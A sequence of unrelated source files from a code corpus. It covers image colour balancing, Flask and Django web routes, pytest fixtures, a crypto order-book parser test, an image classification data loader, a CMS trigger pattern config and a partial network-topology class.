if abs(U_bar) > abs(V_bar): # U > V: blue needs adjust
err = U_bar
chnl = 2 # blue
else:
err = V_bar
chnl = 0 # red
if abs(err) >= a:
delta = 2 * np.sign(err) * u
elif abs(err) < b: # converged
delta = 0.
break
else:
delta = err * u
gain[chnl] = gain[chnl] - delta
img_rgb = np.dot(np.diag(gain), img_orig)
else:
if cat_type == None:
raise ValueError("cat_type must be provided")
else:
raise ValueError("invalid argument for 'option'")
out = self.__cb_unshape(img_rgb, height, width)
np.clip(out, 0, 255, out=out)
return np.uint8(out)
| 2.390625 | 2 |
tests/conftest.py | zzzeid/lando-ui | 8 | 12760970 | <reponame>zzzeid/lando-ui
# This Source Code Form is subject to the terms of the Mozilla Public
# License, v. 2.0. If a copy of the MPL was not distributed with this
# file, You can obtain one at http://mozilla.org/MPL/2.0/.
import os
import binascii
import json
import pytest
import socket
from landoui.app import create_app
@pytest.fixture
def docker_env_vars(monkeypatch):
"""Monkeypatch environment variables that we'd get running under docker."""
monkeypatch.setenv("OIDC_DOMAIN", "test_oidc_domain")
monkeypatch.setenv("OIDC_CLIENT_ID", "test_oidc_client_id")
monkeypatch.setenv("OIDC_CLIENT_SECRET", "test_oidc_secret")
monkeypatch.setenv("DEBUG", "True")
monkeypatch.setenv("HOST", "0.0.0.0")
monkeypatch.setenv("PORT", "7777")
monkeypatch.setenv("LANDO_API_OIDC_IDENTIFIER", "lando-api-oidc-identifier")
monkeypatch.setenv("VERSION_PATH", "/version.json")
monkeypatch.setenv("SECRET_KEY", "secret_key_change_me")
monkeypatch.setenv("SESSION_COOKIE_NAME", "{}:7777".format(socket.gethostname()))
monkeypatch.setenv("SESSION_COOKIE_DOMAIN", "{}:7777".format(socket.gethostname()))
monkeypatch.setenv("SESSION_COOKIE_SECURE", "0")
monkeypatch.setenv("USE_HTTPS", "0")
monkeypatch.setenv("LANDO_API_URL", "http://lando-api.test:8888")
monkeypatch.setenv("SENTRY_DSN", "")
monkeypatch.setenv("LOG_LEVEL", "DEBUG")
@pytest.fixture
def api_url():
"""A string holding the Lando API base URL. Useful for request mocking."""
return "http://lando-api.test"
@pytest.fixture
def app(versionfile, docker_env_vars, api_url):
app = create_app(
version_path=versionfile.strpath,
secret_key=str(binascii.b2a_hex(os.urandom(15))),
session_cookie_name="lando-ui",
session_cookie_domain="lando-ui.test:7777",
session_cookie_secure=False,
use_https=0,
enable_asset_pipeline=False,
lando_api_url=api_url,
debug=True,
)
# Turn on the TESTING setting so that exceptions within the app bubble up
# to the test runner. Otherwise Flask will hide the exception behind a
# generic HTTP 500 response, and that makes writing and debugging tests
# much harder.
app.config["TESTING"] = True
return app
@pytest.fixture
def versionfile(tmpdir):
"""Provide a temporary version.json on disk."""
v = tmpdir.mkdir("app").join("version.json")
v.write(
json.dumps(
{
"source": "https://github.com/mozilla-conduit/lando-api",
"version": "0.0.0",
"commit": "",
"build": "test",
}
)
)
return v
| 1.914063 | 2 |
tests/cex_test.py | olned/ssc2ce-cpp | 0 | 12760971 | <reponame>olned/ssc2ce-cpp
# Copyright <NAME> 2020.
# Distributed under the Boost Software License, Version 1.0.
# See accompanying file LICENSE
# or copy at http://www.boost.org/LICENSE_1_0.txt
from unittest import TestCase, main
import ssc2ce_cpp as m
class TestCoinbaseParser(TestCase):
def setUp(self):
self.parser = m.CexParser()
self.top_prices = {}
self.top_bid = 0
self.top_ask = 0
self.book_setup_count = 0
self.parser.set_on_book_setup(self.handle_book_setup)
self.book_update_count = 0
self.parser.set_on_book_update(self.handle_book_update)
def handle_book_setup(self, book):
if book.instrument() in self.top_prices:
top = self.top_prices[book.instrument()]
top["bid"] = book.top_bid_price()
top["ask"] = book.top_ask_price()
else:
self.top_prices[book.instrument()] = dict(
bid=book.top_bid_price(),
ask=book.top_ask_price()
)
self.book_setup_count += 1
def handle_book_update(self, book):
top = self.top_prices[book.instrument()]
top["bid"] = book.top_bid_price()
top["ask"] = book.top_ask_price()
self.book_update_count += 1
def test_book(self):
book_snapshot = '{"e":"order-book-subscribe","data":{"timestamp":1592738201,"bids":[[8355.0,0.80000000],[8354.9,0.08562700],[8354.6,0.26770000]],"asks":[[8384.3,0.80000000],[8384.4,0.10000000],[8392.4,1.00000000]],"pair":"BTC:EUR","id":346101544,"sell_total":"176.22612139","buy_total":"1330266.42"},"oid":"book-1", "ok":"ok"}'
self.assertEqual(self.parser.parse(book_snapshot), True)
book = self.parser.get_book("BTC:EUR")
self.assertEqual(book.top_ask_price(), 8384.3)
self.assertEqual(book.top_bid_price(), 8355.0)
top = self.top_prices[book.instrument()]
self.assertEqual(top["ask"], 8384.3)
self.assertEqual(top["bid"], 8355.0)
self.assertEqual(self.book_setup_count, 1)
self.assertEqual(self.book_update_count, 0)
book_update = '{"e":"md_update","data":{"id":346101545,"pair":"BTC:EUR","time":1592738202189,"bids":[[8355.1,0.08562700],[8354.9,0.00000000]],"asks":[]}}'
self.assertEqual(self.parser.parse(book_update), True)
self.assertEqual(top["ask"], 8384.3)
self.assertEqual(top["bid"], 8355.1)
book_update = '{"e":"md_update","data":{"id":346101546,"pair":"BTC:EUR","time":1592738206257,"bids":[],"asks":[[8334.9,0.26770000],[8412.2,0.00000000]]}}'
self.assertEqual(self.parser.parse(book_update), True)
self.assertEqual(top["ask"], 8334.9)
self.assertEqual(top["bid"], 8355.1)
self.assertEqual(self.book_setup_count, 1)
self.assertEqual(self.book_update_count, 2)
if __name__ == '__main__':
main()
| 2.359375 | 2 |
web/public.py | mingziV5/NiuB | 0 | 12760972 | <reponame>mingziV5/NiuB<gh_stars>0
#coding:utf-8
from __future__ import unicode_literals
from flask import Flask, render_template, session, redirect, request
from . import app
import requests
import json
import utils
headers = {'Content-Type': 'application/json'}
data = {
'jsonrpc': '2.0',
'id': 1,
}
def get_api():
return 'http://%s/api' %app.config['api_url']
@app.route('/listapi')
def listapi():
headers['authorization'] = session['author']
method = request.args.get('method')
data['method'] = method + '.getlist'
where = request.args.get('where')
data['params'] = {}
if where == '1' and method == 'server':
data['params']['where'] = {'sg_id': request.args.get('sg_id')}
utils.write_log('web').info(data)
r = requests.post(get_api(), headers = headers, json = data)
utils.write_log('web').info(r.text)
return r.text
@app.route('/addapi', methods = ['GET', 'POST'])
def addapi():
headers['authorization'] = session['author']
form_data = dict((k, ','.join(v)) for k, v in dict(request.form).items())
method = form_data['method']
data['method'] = method + '.create'
form_data.pop('method')
data['params'] = form_data
utils.write_log('web').info(data)
r = requests.post(get_api(), headers = headers, json = data)
return r.text
@app.route('/getapi')
def getapi():
headers['authorization'] = session['author']
method = request.args.get('method')
data['method'] = method + '.get'
u_id = request.args.get('id')
data['params'] = {
'm_table': request.args.get('m_table', None),
'field': request.args.get('field', None),
's_table': request.args.get('s_table', None),
'where': {'id': int(u_id)}
}
print data
utils.write_log('web').info(data)
r = requests.post(get_api(), headers = headers, json = data)
return r.text
@app.route('/updateapi', methods=['GET', 'POST'])
def updateapi():
headers['authorization'] = session['author']
form_data = dict((k, ','.join(v)) for k, v in dict(request.form).items())
print form_data
method = form_data['method']
data['method'] = method + '.update'
form_data.pop('method')
data['params'] = {
'data': form_data,
'where': {
'id': int(form_data['id'])
}
}
print data
utils.write_log('web').info(data)
r = requests.post(get_api(), headers = headers, json = data)
return r.text
@app.route('/deleteapi')
def deleteapi():
headers['authorization'] = session['author']
method = request.args.get('method')
data['method'] = method + '.delete'
data['params'] = {
'where': {
'id': int(request.args.get('id'))
}
}
utils.write_log('web').info(data)
r = requests.post(get_api(), headers = headers, json = data)
return r.text
| 2.40625 | 2 |
Listboxapps_by2.py | gauravssnl/Symbian-Python-Files | 7 | 12760973 | <reponame>gauravssnl/Symbian-Python-Files
import e32,appuifw,os
from graphics import *
import geticon
import multimbm
import applist
limit=2
entries=[]
def listapps():
global entries,limit
lapp=applist.applist()
lapp1=[(el[1],el[0]) for el in lapp]
lmbm=[]
entries=[]
c=0
uidno=0xa89fd974
puz2=geticon.get(uidno,(50,50))
ipuz=Image.from_cfbsbitmap(puz2[0])
mpuz=Image.from_cfbsbitmap(puz2[1])
sd=0
for el in lapp1:
try:
i2=geticon.get(el[1],(50,50))
except:
print 'p: ',el
try:
i=Image.from_cfbsbitmap(i2[0])
imask=Image.from_cfbsbitmap(i2[1])
except:
print i2[0]
i=ipuz
imask=mpuz
lmbm.append(i)
lmbm.append(imask)
entries.append((el[0],unicode(hex(el[1])),appuifw.Icon(u'd:\\iapps.mbm', sd,sd+1)))
sd+=2
c+=1
if c>=limit: break
multimbm.create(u'd:\\iapps.mbm',lmbm)
app_lock = e32.Ao_lock()
def exit():
app_lock.signal()
def display():
global entries
listapps()
lb=appuifw.Listbox(entries,lambda:None)
appuifw.app.body=lb
def setlimit():
global limit
limit=appuifw.query(u'limit','number',1)
appuifw.app.menu=[(u'list apps',display),(u'set limit',setlimit)]
appuifw.app.exit_key_handler = exit
app_lock.wait()
| 2.34375 | 2 |
crowdsorting/app_resources/Strings_List.py | matthew-cheney/crowd-sorting-single-threaded | 1 | 12760974 | # This file will store strings for the entire app
# Error Strings
space_in_first_name_error = 'First name may not contain spaces'
space_in_last_name_error = 'Last name may not contain spaces'
# Dashboard Strings
my_projects = "My Projects"
no_projects = "Looks like you don't have any projects yet. Select Add project, or check back later."
add_project_button = "add project"
join_code_prompt = "Enter a join code:"
add_project_name_field = "project name"
add_project_join_field = "join code"
join_public_prompt = "Join a public project:"
select_project_prompt = "Select a project to work on"
# General Strings
submit_button = "submit"
join_button = "join"
select_button = "select"
leave_button = "leave" | 2.03125 | 2 |
bp_storage/classification.py | BrainPlugAI/bp-storage | 1 | 12760975 | <gh_stars>1-10
'''Data Loader for classification dataset.
author: <NAME>
'''
from random import randint
import numpy as np
import os, glob, math
import shutil
from . import utils
def _img_gen(folder):
imgs = utils.search_imgs(folder)
for img in imgs:
yield utils.imread(img)
def _find_classes(folder, only):
'''Retrieves the relevant classes from the '''
# generate data
folders = utils.only_folders(only)
# find all classes (iterate through all relevant folders)
rel_classes = []
for btype in folders:
# iterate through all possible dirs
for dir in folders[btype]:
# generate the folder name and check if exists
dir = os.path.join(folder, dir)
if not os.path.exists(dir):
continue
# iterate through all subdirs
_, dirs, _ = next(os.walk(dir))
for cls_dir in dirs:
cls_name = cls_dir.upper()
cls_dir = os.path.join(dir, cls_dir)
if not os.path.isdir(cls_dir):
continue
if cls_name not in rel_classes:
rel_classes.append(cls_name)
# return the generated classess
return rel_classes
def _gen_single(img, cls_name, classes, btype, one_hot=True, beard_format=False, show_btype=False):
'''Generate tuple for a single output.'''
if one_hot:
cls_name = np.eye(len(classes))[classes.index(cls_name)]
if beard_format:
if show_btype: return img, {}, [{utils.const.ITEM_CLASS: cls_name, utils.const.ITEM_BBOX: [0,0,0,0]}], btype
else: return img, {}, [{utils.const.ITEM_CLASS: cls_name, utils.const.ITEM_BBOX: [0,0,0,0]}]
else:
if show_btype: return img, cls_name, btype
else: return img, cls_name
def _gen_cls(folder, classes, shuffle=True, only=None, size=None, one_hot=True, beard_format=False, show_btype=False, resize=utils.ResizeMode.FIT, pad_color=(0,0,0), pad_mode=utils.PadMode.EDGE, debug=False):
'''Loads the images from the given folder.
Default output format is img, label, btype
Args:
folder (str): folder to load the data from
classes (list): list of classes (prefered upper case)
shuffle (bool): defines if the data should be shuffled (default: True)
only (DataType):
size (int):
one_hot (bool): defines if the classes should be given as one_hot vectors
beard_format (bool): defines if the generator should output in the same format as the beard & kitti generators
'''
# generate data
folders = utils.only_folders(only)
if classes is None:
raise ValueError("Expected list of classes, but got None!")
classes = [x.upper() for x in classes]
# iterate through folders
for btype in folders:
found = False
for dir in folders[btype]:
# check if folder exists
dir = os.path.join(folder, dir)
if not os.path.exists(dir):
continue
found = True
# check class folders
cls_gens = []
_, dirs, _ = next(os.walk(dir))
for cls_dir in dirs:
cls_name = cls_dir.upper()
cls_dir = os.path.join(dir, cls_dir)
if not os.path.isdir(cls_dir):
continue
if classes is None or cls_name in classes:
cls_gens.append((cls_name, _img_gen(cls_dir)))
# shuffle the classes
if not shuffle:
for cls_name, gen in cls_gens:
for img in gen:
img, _, _ = lib.resize(img, size, resize, pad_color, pad_mode)
yield _gen_single(img, cls_name, classes, btype, one_hot, beard_format, show_btype)
else:
while len(cls_gens) > 0:
id = randint(0, len(cls_gens) - 1)
try:
cls_name, gen = cls_gens[id]
img = next(gen)
img, _, _ = utils.resize(img, size, resize, pad_color, pad_mode)
yield _gen_single(img, cls_name, classes, btype, one_hot, beard_format, show_btype)
except StopIteration:
del cls_gens[id]
# debug output
if not found:
if debug: print("Could not find folder for type: {}".format(btype.name))
def load(folder, classes=None, only=None, size=None, one_hot=True, beard_format=False, show_btype=False, resize=utils.ResizeMode.FIT, pad_color=(0,0,0), pad_mode=utils.PadMode.EDGE, debug=False, shuffle=True):
'''Loads the classification data from file.
Returns:
folder (str): Folder that contains the classification structure
debug (bool): Defines if debugs messages should be shown
'''
# safty: check if the folder exists
if not os.path.exists(folder):
raise IOError("Specified folder ({}) does not exist!".format(folder))
# load the relevant classes
if classes is None:
classes = _find_classes(folder, only)
return classes, _gen_cls(folder, classes, shuffle, only, size, one_hot, beard_format, show_btype, resize, pad_color, pad_mode, debug)
def load_sample_imgs(folder, only, size=None, count=10, classes=None, resize=utils.ResizeMode.FIT, pad_color=(0,0,0), pad_mode=utils.PadMode.EDGE):
'''Loads relevant count of sample images'''
# safty: check if the folder exists
if not os.path.exists(folder):
raise IOError("Specified folder ({}) does not exist!".format(folder))
# load the relevant classes
if classes is None:
classes = _find_classes(folder, only)
gen = _gen_cls(folder, classes, True, only, size, True, False, False, resize, pad_color, pad_mode, False)
imgs = []
labels = []
for img, lbl in gen:
# check for end
if len(imgs) >= count: break
if np.random.randint(0, 10) > 5: continue
# add data
imgs.append(img)
labels.append(lbl)
# compress
imgs = np.stack(imgs, axis=0)
labels = np.stack(labels, axis=0)
return imgs, labels
def write(folder, debug=False):
raise NotImplementedError
| 2.5625 | 3 |
L1Trigger/GlobalTriggerAnalyzer/python/l1GtPatternGenerator_cfi.py | ckamtsikis/cmssw | 852 | 12760976 | <filename>L1Trigger/GlobalTriggerAnalyzer/python/l1GtPatternGenerator_cfi.py
import FWCore.ParameterSet.Config as cms
l1GtPatternGenerator = cms.EDAnalyzer("L1GtPatternGenerator",
# input tags for various records
GtInputTag = cms.InputTag("gtDigis"),
GmtInputTag = cms.InputTag("gmtDigis"),
GctInputTag = cms.InputTag("gctDigis"),
CscInputTag = cms.InputTag("gtDigis", "CSC"),
DtInputTag = cms.InputTag("gtDigis", "DT"),
RpcbInputTag = cms.InputTag("gtDigis", "RPCb"),
RpcfInputTag = cms.InputTag("gtDigis", "RPCf"),
# file name
PatternFileName = cms.string("GT_GMT_patterns.txt"),
# bunch crossing numbers to write
bx = cms.vint32(0),
# header
PatternFileHeader = cms.string(
"""#GT_GMT_patterns_VD
#
# editors - HB 220606
#
# remarks:
# values in this template are for version VD (same as VB) for the cond-chips of GTL9U (from IVAN)
#
# syntax:
# character "#" indicates a comment line
# header line 1 => hardware of sim- and spy-memories
# header line 2 => hardware location (FPGA-chip) of sim-memories
# header line 3 => channel number of sim-memories (PSB)
# header line 4 => hardware location (FPGA-chip) of spy-memories
# header line 5 => name of patterns
# header line 6 => number of objects (calos, muons) or other declarations
# (header line 7 => only graphics)
# (header line 8 => only text and graphics)
# header line 9 => number of columns, starting with 0
#
# patterns:
# values in column 0 are event numbers (decimal), starting with 0 (synchronisation data)
# patterns for 1024 events (memories of cond-chips on GTL9U can contain only 1024 events) are in this file
# values in columns 1-119 are the hexadecimal patterns, the rightmost digit in a string is LSB
#
# header:
# e |<--------------------------------------------------------------------------PSB/GTL9U(REC)------------------------------------------------------------------------------------------------------------->|<--------------------------------------------------------------------------PSB/GMT(AUF,AUB)--------------------------------------------------------------------------------------------------------------------------------------------------->|<----------------------------------------------------------------GMT REGIONAL MUONs----------------------------------------------------------->|<----GMT(SORT)/GTL9U(REC)----->|<--------------GTL9U(COND)/FDL(ALGO)---------------->|<-----------FDL----------->|
# v |PSB slot13/ch6+7 |PSB slot13/ch4+5 |PSB slot13/ch2+3 |PSB slot13/ch0+1 |PSB slot14/ch6+7 |PSB slot14/ch4+5 |PSB slot14/ch2+3 |PSB slot14/ch0+1 |PSB slot15/ch2+3 |PSB slot15/ch0+1 |PSB slot19/ch6+7 |PSB slot19/ch4+5 |PSB slot19/ch2+3 |PSB slot19/ch0+1 |PSB slot20/ch6+7 |PSB slot20/ch4+5 |PSB slot20/ch2+3 |PSB slot20/ch0+1 |PSB slot21/ch6+7 |PSB slot21/ch4+5 |PSB slot21/ch2+3 |PSB slot21/ch0+1 |GMT INF |GMT INC |GMT IND |GMT INB |GMT SORT |COND1 |COND2 |PSB slot9/ch0+1 |FINOR |
# e |ch6 ch7 ch6 ch7 |ch4 ch5 ch4 ch5 |ch2 ch3 ch2 ch3 |ch0 ch1 ch0 ch1 |ch6 ch7 ch6 ch7 |ch4 ch5 ch4 ch5 |ch2 ch3 ch2 ch3 |ch0 ch1 ch0 ch1 |ch2 ch3 ch2 ch3 |ch0 ch1 ch0 ch1 |ch6 ch7 ch6 ch7 |ch4 ch5 ch4 ch5 |ch2 ch3 ch2 ch3 |ch0 ch1 ch0 ch1 |ch6 ch7 ch6 ch7 |ch4 ch5 ch4 ch5 |ch2 ch3 ch2 ch3 |ch0 ch1 ch0 ch1 |ch6 ch7 ch6 ch7 |ch4 ch5 ch4 ch5 |ch2 ch3 ch2 ch3 |ch0 ch1 ch0 ch1 | | | | | | | |ch0 ch1 ch0 ch1 | |
# n |GTL9U REC1 |GTL9U REC1 |GTL9U REC2 |GTL9U REC2 |GTL9U REC2 |GTL9U REC2 |GTL9U REC3 |GTL9U REC3 |GTL9U REC3 |GTL9U REC3 |GMT AUF |GMT AUF |GMT AUB |GMT AUB |GMT AUF |GMT AUF |GMT AUB |GMT AUB |GMT AUF |GMT AUF |GMT AUB |GMT AUB | | | | |GTL9U REC1 |FDL ALGO |FDL ALGO |FDL ALGO | |
# t |calo1 (ieg) |calo2 (eg) |calo3 (jet) |calo4 (fwdjet) |calo5 (tau) |calo6 (esums) |calo7 (hfbc/etsums)|calo8 (free) |calo9 (totem) |calo10 (free) |MQF4 |MQF3 |MQB2 |MQB1 |MQF8 |MQF7 |MQB6 |MQB5 |MQF12 |MQF11 |MQB10 |MQB9 |RPC forward |CSC |DT |RPC barrel |muon (sorted four) |algo |algo |techtrigger | |
# | 1 2 3 4 | 1 2 3 4 | 1 2 3 4 | 1 2 3 4 | 1 2 3 4 | 1 2 3 4 | 1 2 3 4 | 1 2 3 4 | 1 2 3 4 | 1 2 3 4 |45M 45Q 6M 6Q |45M 45Q 6M 6Q |01M 01Q 23M 23Q |01M 01Q 23M 23Q |45M 45Q 6M 6Q |45M 45Q 6M 6Q |01M 01Q 23M 23Q |01M 01Q 23M 23Q |45M 45Q 6M 6Q |45M 45Q 6M 6Q |01M 01Q 23M 23Q |01M 01Q 23M 23Q | 1 2 3 4 | 1 2 3 4 | 1 2 3 4 | 1 2 3 4 | 1 2 3 4 |191--160 159--128 127---96|95----64 63----32 31-----0|15-0 47-32 31-16 63-48| |
# | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | |
# columns: | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | |
# 0 | 1 2 3 4 | 5 6 7 8 | 9 10 11 12 | 13 14 15 16 | 17 18 19 20 | 21 22 23 24 | 25 26 27 28 | 29 30 31 32 | 33 34 35 36 | 37 38 39 40 | 41 42 43 44 | 45 46 47 48 | 49 50 51 52 | 53 54 55 56 | 57 58 59 60 | 61 62 63 64 | 65 66 67 68 | 69 70 71 72 | 73 74 75 76 | 77 78 79 80 | 81 82 83 84 | 85 86 87 88 | 89 90 91 92 | 93 94 95 96 | 97 98 99 100 | 101 102 103 104 | 105 106 107 108 | 109 110 111 | 112 113 114 | 115 116 117 118|119 |
"""),
# footer
PatternFileFooter = cms.string(""),
# A vector of column names to be written for each pattern file line
PatternFileColumns = cms.vstring(),
# A vector of the lengths (in bits!) of each column
PatternFileLengths = cms.vuint32(),
# A vector of default values for each column
PatternFileDefaultValues = cms.vuint32(),
# By default, do not add comments with detailed information
DebugOutput = cms.bool(False)
)
def addBlock(analyzer, name, count, length, default):
for i in range(1,count+1):
analyzer.PatternFileColumns.append("%s%d" % (name, i))
analyzer.PatternFileLengths.append(length)
analyzer.PatternFileDefaultValues.append(default)
def addPSB(analyzer, name):
addBlock(analyzer, name, 4, 16, 0)
def addRegionalMuons(analyzer, name):
# regional muons are different - they need to have a default of 0x0000ff00 when
# empty to make input cable disconnects recognizable
addBlock(analyzer, name, 4, 32, 0x0000ff00)
def addGMTMuons(analyzer, name):
addBlock(analyzer, name, 4, 26, 0)
# set up format:
fields = l1GtPatternGenerator.PatternFileColumns
lengths = l1GtPatternGenerator.PatternFileLengths
defaults = l1GtPatternGenerator.PatternFileDefaultValues
# column 1..20: some fairly standard PSBs (calo1 - calo5)
for name in [ "gctIsoEm", "gctEm", "cenJet", "forJet", "tauJet" ]:
addPSB(l1GtPatternGenerator, name)
# then the energy sums, which are slightly more complicated
# (calo6)
fields += ["etTotal1", "etMiss1", "etHad1", "etMissPhi1"]
lengths += [ 16, 16, 16, 16]
defaults += [ 0, 0, 0, 0]
# HF bit counts / etsums (which are mangled in the C++ code)
# (calo7)
fields += [ "hfPsbValue1_l", "htMiss1", "hfPsbValue1_h", "unknown"]
lengths += [ 16, 16, 16, 16]
defaults += [ 0, 0, 0, 0]
# calo8 - free
addPSB(l1GtPatternGenerator, "unknown")
# calo9 - "totem", currently
addPSB(l1GtPatternGenerator, "unknown")
# calo 10
# BPTX/Castor and TBD data - default to 0xffff to get BPTX triggers matching GT emulator
addBlock(l1GtPatternGenerator, "unknown", 4, 16, 0xffff)
# 12 more PSBs we don't fill
for i in range(12):
addPSB(l1GtPatternGenerator, "unknown")
# regional muons
addRegionalMuons(l1GtPatternGenerator, "fwdMuon")
addRegionalMuons(l1GtPatternGenerator, "cscMuon")
addRegionalMuons(l1GtPatternGenerator, "dtMuon")
addRegionalMuons(l1GtPatternGenerator, "brlMuon")
# global muons
addGMTMuons(l1GtPatternGenerator, "gmtMuon")
# GT stuff
addBlock(l1GtPatternGenerator, "gtDecisionExt", 2, 32, 0)
addBlock(l1GtPatternGenerator, "gtDecision", 4, 32, 0)
# tech triggers: a bit complicated, since we like to mix up
# half-words (see header)
fields += ["gtTechTrigger1_l", "gtTechTrigger2_l", "gtTechTrigger1_h", "gtTechTrigger2_h"]
lengths += [ 16, 16, 16, 16]
defaults += [ 0, 0, 0, 0]
fields += ["gtFinalOr"]
lengths += [ 9]
defaults += [ 0]
# just to make sure the python magic adds up to the proper output format
if len(fields) != 119:
raise ValueError("Expecting 119 data fields (120 - event number) in pattern file format, got %d!" % len(fields) )
# For debugging: Get an overview of your pattern file format
#print fields
#print lengths
#print defaults
| 2.03125 | 2 |
bookmanager/book/urls.py | yangyi-d/django_base | 0 | 12760977 | <filename>bookmanager/book/urls.py<gh_stars>0
from django.urls import path
from book import views
from django.urls.converters import register_converter
# 自定义转换器
# 1.定义转换器
class MobileConverter:
regex = '1[3-9]\d{9}'
# 验证没有问题的数据交给视图函数
def to_python(self, value):
return value
# def to_url(self, value):
# 将匹配结果用于反向解析传值时使用
# return str(value)
# 2.注册转换器,使用register_converter注册
# register_converter(converter, type_name)
# converter 转换器类
# type_name 转换器名称
register_converter(MobileConverter, 'phone')
urlpatterns = [
# path('admin/', admin.site.urls),
path('', views.index),
# 获取url的路径参数
# http://127.0.0.1:8000/index/456/987/
# 获取到city_id 456 shop_id 987
# 通过转换器实现对数据类型的匹配
# 可以使用自定义的转换器实现自己的匹配需求,比如匹配手机号码
# 使用自定义的转换器识别手机号码
path('<int:city_id>/<phone:shop_id>/', views.shop),
# 获取post请求的参数
path('regist/', views.regist),
# 获取json数据
path('jsondata/', views.json_data),
# 返回JSON数据
path('jsonresponsedata/', views.return_json),
# 设置cookies获取cookies
path('set_cookies/', views.set_cookies),
path('get_cookies/', views.get_cookies),
# 设置session获取验证session
path('set_session/', views.set_session),
path('get_session/', views.get_session),
# 使用类视图,同时处理request与post请求
# 使用as_view函数,返回view函数对象
# 使用类视图需要使用类名称.as_view()函数
path('login/', views.LoginView.as_view())
]
| 2.359375 | 2 |
setup.py | AcheqRhermini/submodule-graph | 0 | 12760978 | import setuptools
def install_requires():
return ['click', 'pydot', 'configparser']
with open("README.md", "r") as fh:
long_description = fh.read()
setuptools.setup(
name="submodulegraph",
version="1.0.0",
author="<NAME>",
author_email="<EMAIL>",
py_modules=['submodulegraph'],
description="Visualize Git Submodule Graphs",
long_description=long_description,
long_description_content_type="text/markdown",
url="https://github.com/bacox/submodule-graph",
install_requires=install_requires(),
classifiers=[
"Programming Language :: Python :: 3",
"License :: OSI Approved :: MIT License",
"Operating System :: OS Independent",
],
entry_points="""
[console_scripts]
submodulegraph=submodulegraph:main
""",
)
| 1.640625 | 2 |
code/analysis/gather_annotation_statistics.py | MichSchli/GCNQA | 2 | 12760979 | <reponame>MichSchli/GCNQA<filename>code/analysis/gather_annotation_statistics.py
import argparse
import operator
import random
from operator import itemgetter
parser = argparse.ArgumentParser(description='Make sure models cannot cheat regardless of implementation bugs.')
parser.add_argument('--annotation_file')
args = parser.parse_args()
type_dict = {}
type_next = False
for line in open(args.annotation_file, 'r'):
line = line.strip()
if line == "Error type:":
type_next = True
elif type_next:
type_next = False
listed_types = line.split("|")
for listed_type in listed_types:
if listed_type not in type_dict:
type_dict[listed_type] = 1
else:
type_dict[listed_type] += 1
sorted_dict = reversed(sorted(type_dict.items(), key=operator.itemgetter(1)))
for type, count in sorted_dict:
spacing = " " * (60 - len(type))
print(type + spacing + str(count)) | 2.703125 | 3 |
topology.py | NanoMembers/DeepFlow | 3 | 12760980 | import util
import sys as _sys
class Topology:
def __init__(self, exp_config):
#System parameters
self.par2Dev = exp_config.system_config.device_placement.par2Dev
self.num_wafers = exp_config.system_config.num_wafers
self.num_nodes_per_wafer= exp_config.system_config.num_nodes_per_wafer
self.tot_nodes = exp_config.system_config.tot_nodes
self.adj = [[0 for x in range(self.tot_nodes)] for x in range(self.tot_nodes)]
#Parallelization Params
self.lp_dim = exp_config.sch_config.lp
self.dp_dim = exp_config.sch_config.dp
h1 = exp_config.sch_config.kp_hidden_dim1
s1 = exp_config.sch_config.kp_softmax_dim1
e1 = exp_config.sch_config.kp_embedding_dim1
p1 = exp_config.sch_config.kp_projection_dim1
h2 = exp_config.sch_config.kp_hidden_dim2
s2 = exp_config.sch_config.kp_softmax_dim2
e2 = exp_config.sch_config.kp_embedding_dim2
p2 = exp_config.sch_config.kp_projection_dim2
self.kp_dim = max(h1 * h2, s1 * s2, p1 * p2, e1 * e2)
#Verify system_hierarchy configuration is valid
try:
self.sanityCheckSysHierarchy()
except Exception as e:
print("Unexpected error occurred during sanity check of system hierarchy:\n"
"{}".format(e), flush=True)
_sys.exit(0)
#Network parameters
self.data_intra = True;
self.kernel_intra = True;
self.layer_intra = True;
self.mem_frac = exp_config.perimeter_breakdown.DRAM
self.inter_frac = exp_config.perimeter_breakdown.inter_node
self.intra_frac = exp_config.perimeter_breakdown.intra_node
self.createAdjacancyMatrix(kp = self.kp_dim, lp = self.lp_dim, dp = self.dp_dim);
self.interNodeDegree, self.intraNodeDegree = self.findMaxDegree()
self.intra_par = True if self.intraNodeDegree > 0 else False
self.inter_par = True if self.interNodeDegree > 0 else False
def sanityCheckSysHierarchy(self):
assert (self.tot_nodes == self.dp_dim * self.kp_dim * self.lp_dim), "tot_nodes != dp * kp * lp"
for key, val in self.par2Dev.items():
wafer_id, node_id = val
dp, lp, kp = key
#assert (dp < self.dp_dim), "data shard index out of bound"
assert (dp < self.dp_dim), "@wafer {}, node {}, data shard index ({}) >= data parallel shards ({})".format(wafer_id, node_id, dp, self.dp_dim)
assert (kp < self.kp_dim), "@wafer {}, node {}, kernel shard index ({}) >= kernel parallel shards ({})".format(wafer_id, node_id, kp, self.kp_dim)
assert (lp < self.lp_dim), "@wafer {}, node {}, layer shard index ({}) >= layer parallel shards ({})".format(wafer_id, node_id, lp, self.lp_dim)
def node_id(self, point):
wafer_id, node_id = point
return wafer_id * self.num_nodes_per_wafer + node_id
def createAdjacancyMatrix(self, kp, lp, dp):
#0 not connected
#1 connected internally
#2 connected externally
#connect kernel parallel connections
#Assumption: reduction is performed through ring-all-reduce algorithm
for i in range(0, dp):
for j in range(0, lp):
for k in range(0, kp):
start_point = self.par2Dev[(i,j,k)];
end_point = self.par2Dev[(i,j,(k+1) % kp)];
start_point_id = self.node_id(start_point);
end_point_id = self.node_id(end_point);
if start_point_id != end_point_id:
start_point_wafer_id,_ = start_point
end_point_wafer_id,_ = end_point
self.adj[start_point_id][end_point_id] = \
(1 if (start_point_wafer_id == end_point_wafer_id) else 2)
if start_point_wafer_id != end_point_wafer_id:
self.kernel_intra = False;
#connect layer parallel connections
#Assumption: across layers, for a given data shard, each kernel shard
#need to have connections to all kernel shards in previous layers.
#FIXME: This can be an overkill depending on the type of kernel parallelism.
for i in range(0, dp):
for j in reversed(range(1, lp)):
for k in range(0, kp):
end_point = self.par2Dev[(i,j,k)];
for m in range(0, kp):
start_point = self.par2Dev[(i,j-1,m)];
start_point_id = self.node_id(start_point);
end_point_id = self.node_id(end_point);
if start_point_id != end_point_id:
start_point_wafer_id,_ = start_point
end_point_wafer_id,_ = end_point
self.adj[start_point_id][end_point_id] = \
(1 if (start_point_wafer_id == end_point_wafer_id) else 2)
if start_point_wafer_id != end_point_wafer_id:
self.layer_intra = False;
#connect data parallel connections
#Assumption: within a layer, each parallel kernel can be reduced
for j in range(0, lp):
for k in range(0, kp):
